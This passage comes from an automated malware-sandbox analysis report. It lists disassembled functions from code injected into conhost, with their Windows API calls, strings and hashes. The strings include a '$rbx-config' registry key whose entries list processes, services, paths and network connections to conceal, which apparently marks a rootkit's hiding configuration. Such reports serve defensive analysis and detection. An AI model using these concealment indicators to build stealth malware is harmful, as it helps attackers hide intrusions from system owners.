Instruction Fuzzy Hash: 92117C35620A0187FBB0EB70A5CA7ED73B0B794356F90C12A9406815D3EF7DC478A600

Function 000001B4448A2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 000001B4448A302E

Memory Dump Source

Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 77bacc30024897c50d2f6b4033f6c4c67139cf40be5e418a9d2f65a8796da475
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: B391237AB0165087EF648F25D404BADB391FF54B98F54C125AE4927BCADF78E862C700

Function 000001B444901BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001B444901724: GetProcessHeap.KERNEL32 ref: 000001B44490172F
Part of subcall function 000001B444901724: HeapAlloc.KERNEL32 ref: 000001B44490173E
Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B4449017AE
Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B4449017DB
Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B4449017F5
Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B444901815
Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B444901830
Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B444901850
Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B44490186B
Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B44490188B
Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B4449018A6
Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B4449018C6

SleepEx.KERNELBASE ref: 000001B444901BDF

Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B4449018E1
Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B444901901
Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B44490191C
Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B44490193C
Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B444901957
Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B444901977
Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B444901992
Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B44490199C

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 6e1254c9787817054b27d65b23253e437fec1e13415517c8455c0dc35860bb55
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: 9131EC7920065193FB509F36D9C33E973F5AB84BD6F04D4219E0A87797DF26C8B0A214

Non-executed Functions

Function 000001B444902FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001B444903094
lstrlenW.KERNEL32 ref: 000001B4449032BE

Part of subcall function 000001B444901A30: OpenProcess.KERNEL32 ref: 000001B444901A56
Part of subcall function 000001B444901A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001B444901A74
Part of subcall function 000001B444901A30: PathFindFileNameW.SHLWAPI ref: 000001B444901A83
Part of subcall function 000001B444901A30: lstrlenW.KERNEL32 ref: 000001B444901A8F
Part of subcall function 000001B444901A30: StrCpyW.SHLWAPI ref: 000001B444901AA2
Part of subcall function 000001B444901A30: CloseHandle.KERNEL32 ref: 000001B444901AB0

GetProcAddress.KERNEL32 ref: 000001B4449030A9

Part of subcall function 000001B444903F88: StrCmpNIW.SHLWAPI(?,?,?,000001B44490272F), ref: 000001B444903FA0

StrCmpNIW.SHLWAPI ref: 000001B4449030EC
lstrlenW.KERNEL32 ref: 000001B444903214

Strings

\Device\Nsi, xrefs: 000001B4449030DF
NtQueryObject, xrefs: 000001B44490309F
ntdll.dll, xrefs: 000001B44490308D

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: f19e88b38da2e868398529867b38f79ee213d6d69e11121c6d470f46b12ee64b
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 3BB16A32210A9087EBB98F3AD5807E9B3B5FB44B95F449016EE0953B96DF35CDA0E340

Function 000001B4449084B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001B4449084CC
RtlCaptureContext.NTDLL ref: 000001B4449084F9
RtlLookupFunctionEntry.NTDLL ref: 000001B444908513
RtlVirtualUnwind.NTDLL ref: 000001B444908554
IsDebuggerPresent.KERNEL32 ref: 000001B4449085A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001B4449085C5
UnhandledExceptionFilter.KERNEL32 ref: 000001B4449085D0

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: e3595aa80cb7f297cfd4bdfd6c1cde47688bffe1b9601e4010324c5f3db2d6d5
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: B0312A72305B8086EB64CF60E8903EE7374F788755F44842ADA4E47B9ADF78C658D710

Function 000001B44490CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001B44490CE0B
RtlLookupFunctionEntry.NTDLL ref: 000001B44490CE23
RtlVirtualUnwind.NTDLL ref: 000001B44490CE5E
IsDebuggerPresent.KERNEL32 ref: 000001B44490CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001B44490CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001B44490CEAC

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: f52a36cc636f09f8b5e552652fc3d8b665fe62fa1539667c9fba548d34cf0822
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: CA414A36214B8086EB60CF35E8843DE73B4F788765F504125EA8D47B9ADF38C565CB00

Function 000001B44490DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001B44490DB99
FindNextFileW.KERNEL32 ref: 000001B44490DCCF
FindClose.KERNEL32 ref: 000001B44490DD0F
FindClose.KERNEL32 ref: 000001B44490DD3B

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: ef23d8bfd7e90e7819dfaab127171bb9860a9eb09a815f2fa837f70c63e50882
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 79A1C4327046814BFB609B75A8C43ED7BB1E781B94F18C215DE9927A9BDF78C462E700

Function 000001B444908090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001B4449080BC
GetCurrentThreadId.KERNEL32 ref: 000001B4449080CA
GetCurrentProcessId.KERNEL32 ref: 000001B4449080D6
QueryPerformanceCounter.KERNEL32 ref: 000001B4449080E6

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 0fc1d90d3220575b7f2e7f5799fd329467a67fd21566eb98698ed5738f0ce078
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: F9110336711B048AFB40CB70E8953A833B4F719768F440E21EA6D86BA5DF78C1689280

Function 000001B444901000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001B444901006
HeapAlloc.KERNEL32 ref: 000001B444901015
GetProcessHeap.KERNEL32 ref: 000001B444901028
HeapAlloc.KERNEL32 ref: 000001B444901037

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 90366e5366d00e0c70a64bece1d34f0fc74d4eef949232695818a863a0960041
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: FAE0ED716115049BF7599B62D84479976B1FB88B2AF45C024C90907311EF3884A9A610

Function 000001B44490D894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 000001B44490D220: HeapAlloc.KERNEL32(?,?,00000000,000001B44490C987), ref: 000001B44490D275

Part of subcall function 000001B444910EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001B444910EEB

FindFirstFileExW.KERNEL32 ref: 000001B44490DB99

Part of subcall function 000001B44490D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001B44490674A), ref: 000001B44490D2B6
Part of subcall function 000001B44490D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001B44490674A), ref: 000001B44490D2C0

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: 0bc2fadcf614fe65fe53b86c12825d93c8f1f6ddaa189099f2eb586b8829b897
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: 3281C73230468087FB60DB36A5813EEB7B1E785B94F58C315AEA957B96DF38C061A700

Function 000001B4448A23F0 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: ba63ec2b3e3d03f3cae939323a6bb08408eb99612668a7e48b496dd823500e1b
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 60B1693A311AA087EFA89F25D5507E9B3A4FB44B84F049016EE09637D6EFB5CDA0C740

Function 000001B4448ACE18 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
Instruction ID: 2e2e519d21db3ab41236182649ae8370bdd20ef6a60f49d84cc5fe600eb5c2ed
Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
Instruction Fuzzy Hash: 24A1E43A7046808AFF20DB75E8443EE7BA1AB91B94F14C115DE9977AD6DFB8C462C700

Function 000001B4448ACC94 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
Instruction ID: be96b842b30987697152417e238cb313adde61b72f03c7a98da1dc76df884039
Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
Instruction Fuzzy Hash: 1381B53A70468087EF20DF26E4403EABB91EBD5B94F54C515AE99677D6DFB8C0618700

Function 000001B4448B2AF0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction ID: f912ba5854758a203d3ba1b75dcf7830b72495d304e79a336de37b054240e103
Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction Fuzzy Hash: DB1188B56245D0CBFFA99F2994953997790F3083C5F40C42DE54986A96CF3DC4B08F04

Function 000001B444901724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001B44490172F
HeapAlloc.KERNEL32 ref: 000001B44490173E

Part of subcall function 000001B444901264: GetProcessHeap.KERNEL32 ref: 000001B44490126A
Part of subcall function 000001B444901264: HeapAlloc.KERNEL32 ref: 000001B444901279
Part of subcall function 000001B444901264: GetProcessHeap.KERNEL32 ref: 000001B444901293
Part of subcall function 000001B444901264: HeapAlloc.KERNEL32 ref: 000001B4449012A4

Part of subcall function 000001B444901000: GetProcessHeap.KERNEL32 ref: 000001B444901006
Part of subcall function 000001B444901000: HeapAlloc.KERNEL32 ref: 000001B444901015
Part of subcall function 000001B444901000: GetProcessHeap.KERNEL32 ref: 000001B444901028
Part of subcall function 000001B444901000: HeapAlloc.KERNEL32 ref: 000001B444901037

RegOpenKeyExW.ADVAPI32 ref: 000001B4449017AE
RegOpenKeyExW.ADVAPI32 ref: 000001B4449017DB
RegCloseKey.ADVAPI32 ref: 000001B4449017F5
RegOpenKeyExW.ADVAPI32 ref: 000001B444901815
RegCloseKey.ADVAPI32 ref: 000001B444901830
RegOpenKeyExW.ADVAPI32 ref: 000001B444901850
RegCloseKey.ADVAPI32 ref: 000001B44490186B
RegOpenKeyExW.ADVAPI32 ref: 000001B44490188B
RegCloseKey.ADVAPI32 ref: 000001B4449018A6
RegOpenKeyExW.ADVAPI32 ref: 000001B4449018C6
RegCloseKey.ADVAPI32 ref: 000001B4449018E1
RegOpenKeyExW.ADVAPI32 ref: 000001B444901901
RegCloseKey.ADVAPI32 ref: 000001B44490191C
RegOpenKeyExW.ADVAPI32 ref: 000001B44490193C
RegCloseKey.ADVAPI32 ref: 000001B444901957
RegOpenKeyExW.ADVAPI32 ref: 000001B444901977
RegCloseKey.ADVAPI32 ref: 000001B444901992
RegCloseKey.ADVAPI32 ref: 000001B44490199C

Part of subcall function 000001B4449012B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001B444901315
Part of subcall function 000001B4449012B8: GetProcessHeap.KERNEL32 ref: 000001B444901323
Part of subcall function 000001B4449012B8: HeapAlloc.KERNEL32 ref: 000001B444901334
Part of subcall function 000001B4449012B8: RegEnumValueW.ADVAPI32 ref: 000001B444901393
Part of subcall function 000001B4449012B8: GetProcessHeap.KERNEL32 ref: 000001B4449013DB
Part of subcall function 000001B4449012B8: HeapAlloc.KERNEL32 ref: 000001B4449013E9
Part of subcall function 000001B4449012B8: GetProcessHeap.KERNEL32 ref: 000001B444901406
Part of subcall function 000001B4449012B8: HeapFree.KERNEL32 ref: 000001B444901414
Part of subcall function 000001B4449012B8: lstrlenW.KERNEL32 ref: 000001B44490141D
Part of subcall function 000001B4449012B8: GetProcessHeap.KERNEL32 ref: 000001B44490142B
Part of subcall function 000001B4449012B8: HeapAlloc.KERNEL32 ref: 000001B444901439

Strings

service_names, xrefs: 000001B4449018BF
tcp_local, xrefs: 000001B4449018FA
SOFTWARE\$rbx-config, xrefs: 000001B44490178E
process_names, xrefs: 000001B444901849
tcp_remote, xrefs: 000001B444901935
udp, xrefs: 000001B444901970
pid, xrefs: 000001B44490180E
paths, xrefs: 000001B444901884
startup, xrefs: 000001B4449017D1

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 9bc4a22ea6ab8788bf6f3bd34cfdb0c10a1eb64e2c9d052235ec0966a5482177
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 5A711436210A5087EB609F76E8D17D833B4FB88B9AF419121DE4D83B6ADF39C564E340

Function 000001B4449012B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001B444901315
GetProcessHeap.KERNEL32 ref: 000001B444901323
HeapAlloc.KERNEL32 ref: 000001B444901334
RegEnumValueW.ADVAPI32 ref: 000001B444901393

Part of subcall function 000001B444901530: StrCmpIW.SHLWAPI ref: 000001B444901561

GetProcessHeap.KERNEL32 ref: 000001B4449013DB
HeapAlloc.KERNEL32 ref: 000001B4449013E9
GetProcessHeap.KERNEL32 ref: 000001B444901406
HeapFree.KERNEL32 ref: 000001B444901414
lstrlenW.KERNEL32 ref: 000001B44490141D
GetProcessHeap.KERNEL32 ref: 000001B44490142B
HeapAlloc.KERNEL32 ref: 000001B444901439
StrCpyW.SHLWAPI ref: 000001B44490145B
GetProcessHeap.KERNEL32 ref: 000001B444901472
HeapFree.KERNEL32 ref: 000001B444901480

Strings

d, xrefs: 000001B444901356

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 29ce64bbed44bf87718749bd442be98e20a454b8ddc58ef00a57f35e6f7e2bfd
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: BF515A32200B849BE765CF72E48879A77B1F788F9AF458124DE4A47729DF3CC0699700

Function 000001B44490EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001B44490F34A,?,?,00000000,000001B44490F2CD), ref: 000001B44490EFF5
GetLastError.KERNEL32(?,?,00000000,000001B44490F2CD), ref: 000001B44490F007
LoadLibraryExW.KERNEL32(?,?,00000000,000001B44490F2CD), ref: 000001B44490F049
VirtualProtect.KERNEL32 ref: 000001B44490F0A5
VirtualProtect.KERNEL32 ref: 000001B44490F0D6
FreeLibrary.KERNEL32(?,?,00000000,000001B44490F2CD), ref: 000001B44490F11A
GetProcAddress.KERNEL32(?,?,00000000,000001B44490F2CD), ref: 000001B44490F126

Strings

api-ms-, xrefs: 000001B44490F01B
ext-ms-, xrefs: 000001B44490F02E
AppPolicyGetProcessTerminationMethod, xrefs: 000001B44490F157, 000001B44490F165

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
